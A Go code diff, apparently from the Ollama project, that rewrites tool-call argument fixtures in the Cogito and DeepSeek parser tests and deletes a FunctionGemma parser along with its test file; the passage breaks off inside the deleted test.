Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -52,9 +52,9 @@ func TestCogitoParser(t *testing.T) {
Function: api.ToolFunction{ Function: api.ToolFunction{
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}}, "location": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -71,9 +71,9 @@ func TestCogitoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -83,9 +83,9 @@ func TestCogitoParser(t *testing.T) {
Function: api.ToolFunction{ Function: api.ToolFunction{
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}}, "location": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -103,17 +103,17 @@ func TestCogitoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -123,9 +123,9 @@ func TestCogitoParser(t *testing.T) {
Function: api.ToolFunction{ Function: api.ToolFunction{
Name: "get_weather", Name: "get_weather",
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": {Type: api.PropertyType{"string"}}, "location": {Type: api.PropertyType{"string"}},
}), },
}, },
}, },
}, },
@ -140,11 +140,11 @@ func TestCogitoParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_data", Name: "process_data",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"items": []any{"item1", "item2"}, "items": []any{"item1", "item2"},
"config": map[string]any{"enabled": true, "threshold": 0.95}, "config": map[string]any{"enabled": true, "threshold": 0.95},
"count": 42.0, "count": 42.0,
}), },
}, },
}, },
}, },
@ -238,7 +238,7 @@ This is line 3</think>Final response here.`,
t.Errorf("thinking mismatch (-want +got):\n%s", diff) t.Errorf("thinking mismatch (-want +got):\n%s", diff)
} }
if diff := cmp.Diff(tt.expectedToolCalls, toolCalls, argsComparer); diff != "" { if diff := cmp.Diff(tt.expectedToolCalls, toolCalls); diff != "" {
t.Errorf("tool calls mismatch (-want +got):\n%s", diff) t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
} }
}) })
@ -277,9 +277,9 @@ func TestCogitoParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test_tool", Name: "test_tool",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"arg": "value", "arg": "value",
}), },
}, },
}, },
} }
@ -292,7 +292,7 @@ func TestCogitoParser_Streaming(t *testing.T) {
t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String()) t.Errorf("expected thinking %q, got %q", expectedThinking, finalThinking.String())
} }
if diff := cmp.Diff(expectedToolCalls, finalToolCalls, argsComparer); diff != "" { if diff := cmp.Diff(expectedToolCalls, finalToolCalls); diff != "" {
t.Errorf("tool calls mismatch (-want +got):\n%s", diff) t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
} }
} }
@ -367,7 +367,7 @@ func TestCogitoParser_StreamingEdgeCases(t *testing.T) {
t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String()) t.Errorf("expected thinking %q, got %q", tt.expectedThinking, finalThinking.String())
} }
if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls, argsComparer); diff != "" { if diff := cmp.Diff(tt.expectedToolCalls, finalToolCalls); diff != "" {
t.Errorf("tool calls mismatch (-want +got):\n%s", diff) t.Errorf("tool calls mismatch (-want +got):\n%s", diff)
} }
}) })
@ -412,9 +412,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
expectError: false, expectError: false,
@ -427,11 +427,11 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_data", Name: "process_data",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"items": []any{"item1", "item2"}, "items": []any{"item1", "item2"},
"config": map[string]any{"enabled": true}, "config": map[string]any{"enabled": true},
"count": 42.0, "count": 42.0,
}), },
}, },
}, },
expectError: false, expectError: false,
@ -444,7 +444,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "no_args_tool", Name: "no_args_tool",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
expectError: false, expectError: false,
@ -493,9 +493,9 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
expectError: false, expectError: false,
@ -511,10 +511,10 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
"units": "metric", "units": "metric",
}), },
}, },
}, },
expectError: false, expectError: false,
@ -527,13 +527,13 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "complex_tool", Name: "complex_tool",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"nested": map[string]any{ "nested": map[string]any{
"deep": map[string]any{ "deep": map[string]any{
"value": 123.0, "value": 123.0,
}, },
}, },
}), },
}, },
}, },
expectError: false, expectError: false,
@ -557,7 +557,7 @@ func TestCogitoParser_parseToolCallContent(t *testing.T) {
t.Fatalf("unexpected error: %v", err) t.Fatalf("unexpected error: %v", err)
} }
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" { if diff := cmp.Diff(tt.expected, result); diff != "" {
t.Errorf("tool call mismatch (-want +got):\n%s", diff) t.Errorf("tool call mismatch (-want +got):\n%s", diff)
} }
}) })

View File

@ -51,9 +51,9 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -67,17 +67,17 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "London", "location": "London",
}), },
}, },
}, },
}, },
@ -97,10 +97,10 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_data", Name: "process_data",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"items": []interface{}{"item1", "item2"}, "items": []interface{}{"item1", "item2"},
"config": map[string]interface{}{"enabled": true, "threshold": 0.95}, "config": map[string]interface{}{"enabled": true, "threshold": 0.95},
}), },
}, },
}, },
}, },
@ -115,9 +115,9 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -162,9 +162,9 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Tokyo", "location": "Tokyo",
}), },
}, },
}, },
}, },
@ -191,10 +191,10 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "search", Name: "search",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"query": "北京天气", "query": "北京天气",
"language": "中文", "language": "中文",
}), },
}, },
}, },
}, },
@ -220,10 +220,10 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "execute_command", Name: "execute_command",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"command": "ls && echo \"done\"", "command": "ls && echo \"done\"",
"path": "/home/user", "path": "/home/user",
}), },
}, },
}, },
}, },
@ -244,7 +244,7 @@ func TestDeepSeekParser(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "ping", Name: "ping",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -276,7 +276,7 @@ func TestDeepSeekParser(t *testing.T) {
t.Errorf("Thinking mismatch (-want +got):\n%s", diff) t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
} }
if diff := cmp.Diff(tt.expectedCalls, calls, argsComparer); diff != "" { if diff := cmp.Diff(tt.expectedCalls, calls); diff != "" {
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff) t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
} }
}) })
@ -313,9 +313,9 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -342,7 +342,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "test", Name: "test",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -375,10 +375,10 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
{ {
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calc", Name: "calc",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"x": float64(42), "x": float64(42),
"y": float64(24), "y": float64(24),
}), },
}, },
}, },
}, },
@ -414,7 +414,7 @@ func TestDeepSeekParser_Streaming(t *testing.T) {
t.Errorf("Thinking mismatch (-want +got):\n%s", diff) t.Errorf("Thinking mismatch (-want +got):\n%s", diff)
} }
if diff := cmp.Diff(tt.expectedCalls, allCalls, argsComparer); diff != "" { if diff := cmp.Diff(tt.expectedCalls, allCalls); diff != "" {
t.Errorf("Tool calls mismatch (-want +got):\n%s", diff) t.Errorf("Tool calls mismatch (-want +got):\n%s", diff)
} }
}) })
@ -469,7 +469,7 @@ func TestDeepSeekParser_Init(t *testing.T) {
returnedTools := parser.Init(tools, nil, &api.ThinkValue{Value: true}) returnedTools := parser.Init(tools, nil, &api.ThinkValue{Value: true})
if diff := cmp.Diff(tools, returnedTools, toolsComparer); diff != "" { if diff := cmp.Diff(tools, returnedTools); diff != "" {
t.Errorf("Init() returned tools mismatch (-want +got):\n%s", diff) t.Errorf("Init() returned tools mismatch (-want +got):\n%s", diff)
} }
@ -492,9 +492,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "get_weather", Name: "get_weather",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"location": "Paris", "location": "Paris",
}), },
}, },
}, },
}, },
@ -504,10 +504,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "process_data", Name: "process_data",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"items": []interface{}{"a", "b"}, "items": []interface{}{"a", "b"},
"config": map[string]interface{}{"enabled": true}, "config": map[string]interface{}{"enabled": true},
}), },
}, },
}, },
}, },
@ -517,7 +517,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "ping", Name: "ping",
Arguments: api.NewToolCallFunctionArguments(), Arguments: api.ToolCallFunctionArguments{},
}, },
}, },
}, },
@ -527,9 +527,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "获取天气", Name: "获取天气",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"城市": "北京", "城市": "北京",
}), },
}, },
}, },
}, },
@ -539,10 +539,10 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "execute", Name: "execute",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"command": "ls && echo \"done\"", "command": "ls && echo \"done\"",
"path": "/home/user", "path": "/home/user",
}), },
}, },
}, },
}, },
@ -552,11 +552,11 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "calculate", Name: "calculate",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"x": 3.14, "x": 3.14,
"y": float64(42), "y": float64(42),
"enabled": true, "enabled": true,
}), },
}, },
}, },
}, },
@ -577,9 +577,9 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
expected: api.ToolCall{ expected: api.ToolCall{
Function: api.ToolCallFunction{ Function: api.ToolCallFunction{
Name: "", Name: "",
Arguments: testArgs(map[string]any{ Arguments: api.ToolCallFunctionArguments{
"arg": "value", "arg": "value",
}), },
}, },
}, },
}, },
@ -606,7 +606,7 @@ func TestDeepSeek3Parser_parseToolCallContent(t *testing.T) {
t.Fatalf("Unexpected error: %v", err) t.Fatalf("Unexpected error: %v", err)
} }
if diff := cmp.Diff(tt.expected, result, argsComparer); diff != "" { if diff := cmp.Diff(tt.expected, result); diff != "" {
t.Errorf("parseToolCallContent() mismatch (-want +got):\n%s", diff) t.Errorf("parseToolCallContent() mismatch (-want +got):\n%s", diff)
} }
}) })

View File

@ -1,323 +0,0 @@
package parsers
import (
"fmt"
"regexp"
"strings"
"github.com/ollama/ollama/api"
)
type FunctionGemmaParserState int
const (
FunctionGemmaCollectingContent FunctionGemmaParserState = iota
FunctionGemmaCollectingToolCalls
)
const (
functionGemmaFunctionCallOpen = "<start_function_call>"
functionGemmaFunctionCallClose = "<end_function_call>"
)
// This format uses <start_function_call>call:name{args}<end_function_call> for tool calls.
type FunctionGemmaParser struct {
state FunctionGemmaParserState
buffer strings.Builder
tools []api.Tool
}
func (p *FunctionGemmaParser) HasToolSupport() bool { return true }
func (p *FunctionGemmaParser) HasThinkingSupport() bool { return false }
func (p *FunctionGemmaParser) Init(tools []api.Tool, lastMessage *api.Message, thinkValue *api.ThinkValue) []api.Tool {
p.tools = tools
p.state = FunctionGemmaCollectingContent
return tools
}
type functionGemmaEvent interface {
isFunctionGemmaEvent()
}
type FunctionGemmaEventContent struct {
content string
}
type functionGemmaEventToolCall struct {
toolCall api.ToolCall
}
func (FunctionGemmaEventContent) isFunctionGemmaEvent() {}
func (functionGemmaEventToolCall) isFunctionGemmaEvent() {}
func (p *FunctionGemmaParser) Add(s string, done bool) (content string, thinking string, calls []api.ToolCall, err error) {
p.buffer.WriteString(s)
events := p.parseEvents()
var toolCalls []api.ToolCall
var contentSb strings.Builder
for _, event := range events {
switch event := event.(type) {
case functionGemmaEventToolCall:
toolCalls = append(toolCalls, event.toolCall)
case FunctionGemmaEventContent:
contentSb.WriteString(event.content)
}
}
return contentSb.String(), "", toolCalls, nil
}
func (p *FunctionGemmaParser) parseEvents() []functionGemmaEvent {
var all []functionGemmaEvent
keepLooping := true
for keepLooping {
var events []functionGemmaEvent
events, keepLooping = p.eat()
if len(events) > 0 {
all = append(all, events...)
}
}
return all
}
// emitWithPartialCheck extracts unambiguous content before a potential partial tag
func (p *FunctionGemmaParser) emitWithPartialCheck(bufStr, tag string) (unambiguous, ambiguous string) {
if overlapLen := overlap(bufStr, tag); overlapLen > 0 {
beforePartialTag := bufStr[:len(bufStr)-overlapLen]
return beforePartialTag, bufStr[len(beforePartialTag):]
}
return bufStr, ""
}
func (p *FunctionGemmaParser) eat() ([]functionGemmaEvent, bool) {
bufStr := p.buffer.String()
if bufStr == "" {
return nil, false
}
switch p.state {
case FunctionGemmaCollectingContent:
if strings.Contains(bufStr, functionGemmaFunctionCallOpen) {
split := strings.SplitN(bufStr, functionGemmaFunctionCallOpen, 2)
content := split[0]
p.buffer.Reset()
p.buffer.WriteString(split[1])
p.state = FunctionGemmaCollectingToolCalls
if content != "" {
return []functionGemmaEvent{FunctionGemmaEventContent{content: content}}, true
}
return nil, true
}
unambig, ambig := p.emitWithPartialCheck(bufStr, functionGemmaFunctionCallOpen)
p.buffer.Reset()
p.buffer.WriteString(ambig)
if unambig != "" {
return []functionGemmaEvent{FunctionGemmaEventContent{content: unambig}}, false
}
return nil, false
case FunctionGemmaCollectingToolCalls:
if strings.Contains(bufStr, functionGemmaFunctionCallClose) {
split := strings.SplitN(bufStr, functionGemmaFunctionCallClose, 2)
remaining := split[1]
p.buffer.Reset()
p.buffer.WriteString(remaining)
var events []functionGemmaEvent
if tc, err := p.parseToolCall(split[0]); err == nil {
events = append(events, functionGemmaEventToolCall{toolCall: tc})
}
if !strings.Contains(remaining, functionGemmaFunctionCallOpen) {
p.state = FunctionGemmaCollectingContent
}
return events, true
}
return nil, false
}
return nil, false
}
// Matches call:function_name{args}
var functionGemmaCallRegex = regexp.MustCompile(`call:([^{]+)\{(.*)\}`)
func (p *FunctionGemmaParser) parseToolCall(content string) (api.ToolCall, error) {
toolCall := api.ToolCall{}
// Extract function name and arguments
match := functionGemmaCallRegex.FindStringSubmatch(content)
if len(match) < 3 {
return toolCall, nil
}
toolCall.Function.Name = match[1]
argsStr := match[2]
// Parse arguments
toolCall.Function.Arguments = p.parseArguments(argsStr)
return toolCall, nil
}
// parseArguments parses the key:value,key:value format
func (p *FunctionGemmaParser) parseArguments(argsStr string) api.ToolCallFunctionArguments {
args := api.NewToolCallFunctionArguments()
if argsStr == "" {
return args
}
// Split by comma, but handle nested structures
parts := p.splitArguments(argsStr)
for _, part := range parts {
// Find the first colon to split key:value
colonIdx := strings.Index(part, ":")
if colonIdx == -1 {
continue
}
key := part[:colonIdx]
value := part[colonIdx+1:]
// Parse the value
args.Set(key, p.parseValue(value))
}
return args
}
// splitArguments splits arguments by comma, respecting nested structures
func (p *FunctionGemmaParser) splitArguments(argsStr string) []string {
var parts []string
var current strings.Builder
depth := 0
inEscape := false
for i := 0; i < len(argsStr); i++ {
ch := argsStr[i]
// Check for <escape> tags
if i+8 <= len(argsStr) && argsStr[i:i+8] == "<escape>" {
inEscape = !inEscape
current.WriteString("<escape>")
i += 7 // Skip the rest of <escape>
continue
}
if !inEscape {
switch ch {
case '{', '[':
depth++
current.WriteByte(ch)
case '}', ']':
depth--
current.WriteByte(ch)
case ',':
if depth == 0 {
if current.Len() > 0 {
parts = append(parts, current.String())
current.Reset()
}
continue
}
current.WriteByte(ch)
default:
current.WriteByte(ch)
}
} else {
current.WriteByte(ch)
}
}
if current.Len() > 0 {
parts = append(parts, current.String())
}
return parts
}
// parseValue parses a single value from the FunctionGemma format
func (p *FunctionGemmaParser) parseValue(value string) any {
// Check for escaped string
if strings.HasPrefix(value, "<escape>") && strings.HasSuffix(value, "<escape>") {
// Remove the escape tags
return value[8 : len(value)-8]
}
// Check for boolean
if value == "true" {
return true
}
if value == "false" {
return false
}
// Check for number
if num, ok := parseNumber(value); ok {
return num
}
// Check for array
if strings.HasPrefix(value, "[") && strings.HasSuffix(value, "]") {
return p.parseArray(value[1 : len(value)-1])
}
// Check for object
if strings.HasPrefix(value, "{") && strings.HasSuffix(value, "}") {
return p.parseObject(value[1 : len(value)-1])
}
// Default to string
return value
}
// parseArray parses an array value
func (p *FunctionGemmaParser) parseArray(content string) []any {
var result []any
parts := p.splitArguments(content)
for _, part := range parts {
result = append(result, p.parseValue(part))
}
return result
}
// parseObject parses an object value
func (p *FunctionGemmaParser) parseObject(content string) map[string]any {
result := make(map[string]any)
parts := p.splitArguments(content)
for _, part := range parts {
colonIdx := strings.Index(part, ":")
if colonIdx == -1 {
continue
}
key := part[:colonIdx]
value := part[colonIdx+1:]
result[key] = p.parseValue(value)
}
return result
}
// parseNumber tries to parse a string as a number
func parseNumber(s string) (any, bool) {
// Try integer first
var intVal int64
if _, err := fmt.Sscanf(s, "%d", &intVal); err == nil {
// Check if the entire string was consumed
if fmt.Sprintf("%d", intVal) == s {
return intVal, true
}
}
// Try float
var floatVal float64
if _, err := fmt.Sscanf(s, "%f", &floatVal); err == nil {
return floatVal, true
}
return nil, false
}

View File

@ -1,426 +0,0 @@
package parsers
import (
"testing"
"github.com/google/go-cmp/cmp"
"github.com/ollama/ollama/api"
"github.com/stretchr/testify/assert"
)
func TestFunctionGemmaParser(t *testing.T) {
tests := []struct {
name string
chunks []string
tools []api.Tool
expectedCalls []api.ToolCall
expectedText string
}{
{
name: "plain_content",
chunks: []string{"H", "e", "l", "l", "o", ",", " ", "w", "o", "r", "l", "d", "!"},
expectedCalls: nil,
expectedText: "Hello, world!",
},
{
name: "simple_tool_call",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "weather", "{",
"city", ":", "<", "escape", ">", "Paris", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
},
tools: []api.Tool{
{
Type: "function",
Function: api.ToolFunction{
Name: "get_weather",
Parameters: api.ToolFunctionParameters{
Type: "object",
Properties: testPropsMap(map[string]api.ToolProperty{
"city": {Type: api.PropertyType{"string"}},
}),
},
},
},
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
},
expectedText: "",
},
{
name: "content_before_tool_call",
chunks: []string{
"L", "et", " ", "me", " ", "check", ".",
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "weather", "{",
"city", ":", "<", "escape", ">", "Paris", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
},
expectedText: "Let me check.",
},
{
name: "numeric_arguments",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "add", "{",
"a", ":", "1", ",", "b", ":", "2",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "add",
Arguments: testArgs(map[string]any{"a": int64(1), "b": int64(2)}),
},
},
},
expectedText: "",
},
{
name: "boolean_arguments",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "set", "_", "flag", "{",
"enabled", ":", "true", ",", "verbose", ":", "false",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "set_flag",
Arguments: testArgs(map[string]any{"enabled": true, "verbose": false}),
},
},
},
expectedText: "",
},
{
name: "multiple_tool_calls",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "weather", "{",
"city", ":", "<", "escape", ">", "Paris", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "weather", "{",
"city", ":", "<", "escape", ">", "London", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "Paris"}),
},
},
{
Function: api.ToolCallFunction{
Name: "get_weather",
Arguments: testArgs(map[string]any{"city": "London"}),
},
},
},
expectedText: "",
},
{
name: "array_argument",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "process", "{",
"items", ":", "[",
"<", "escape", ">", "a", "<", "escape", ">", ",",
"<", "escape", ">", "b", "<", "escape", ">", ",",
"<", "escape", ">", "c", "<", "escape", ">",
"]",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "process",
Arguments: testArgs(map[string]any{"items": []any{"a", "b", "c"}}),
},
},
},
expectedText: "",
},
{
name: "object_argument",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "update", "{",
"data", ":", "{",
"name", ":", "<", "escape", ">", "test", "<", "escape", ">", ",",
"value", ":", "42",
"}",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "update",
Arguments: testArgs(map[string]any{
"data": map[string]any{"name": "test", "value": int64(42)},
}),
},
},
},
expectedText: "",
},
{
name: "empty_input",
chunks: []string{},
expectedCalls: nil,
expectedText: "",
},
{
name: "tool_call_with_no_arguments",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "get", "_", "time", "{", "}",
"<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "get_time",
Arguments: api.NewToolCallFunctionArguments(),
},
},
},
expectedText: "",
},
{
name: "content_with_angle_brackets",
chunks: []string{
"The", " ", "result", " ", "is", " ", "a", " ", "<", "value", ">", " ", "tag",
},
expectedCalls: nil,
expectedText: "The result is a <value> tag",
},
{
name: "float_argument",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "set", "_", "temp", "{",
"value", ":", "3", ".", "14",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "set_temp",
Arguments: testArgs(map[string]any{"value": 3.14}),
},
},
},
expectedText: "",
},
{
name: "content_after_tool_call",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "test", "{", "}",
"<", "end", "_", "function", "_", "call", ">",
"Done", "!",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "test",
Arguments: api.NewToolCallFunctionArguments(),
},
},
},
expectedText: "Done!",
},
{
name: "unicode_content_and_arguments",
chunks: []string{
"こんにちは", " ",
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "greet", "{",
"name", ":", "<", "escape", ">", "日本語", "<", "escape", ">",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "greet",
Arguments: testArgs(map[string]any{"name": "日本語"}),
},
},
},
expectedText: "こんにちは ",
},
{
name: "multiple_params_sorted",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "search", "{",
"query", ":", "<", "escape", ">", "test", "<", "escape", ">", ",",
"limit", ":", "10", ",",
"offset", ":", "0",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
Name: "search",
Arguments: testArgs(map[string]any{
"query": "test",
"limit": int64(10),
"offset": int64(0),
}),
},
},
},
expectedText: "",
},
{
name: "nested_object_argument",
chunks: []string{
"<", "start", "_", "function", "_", "call", ">",
"call", ":", "create", "{",
"config", ":", "{",
"settings", ":", "{",
"enabled", ":", "true", ",",
"name", ":", "<", "escape", ">", "test", "<", "escape", ">",
"}",
"}",
"}", "<", "end", "_", "function", "_", "call", ">",
},
expectedCalls: []api.ToolCall{
{
Function: api.ToolCallFunction{
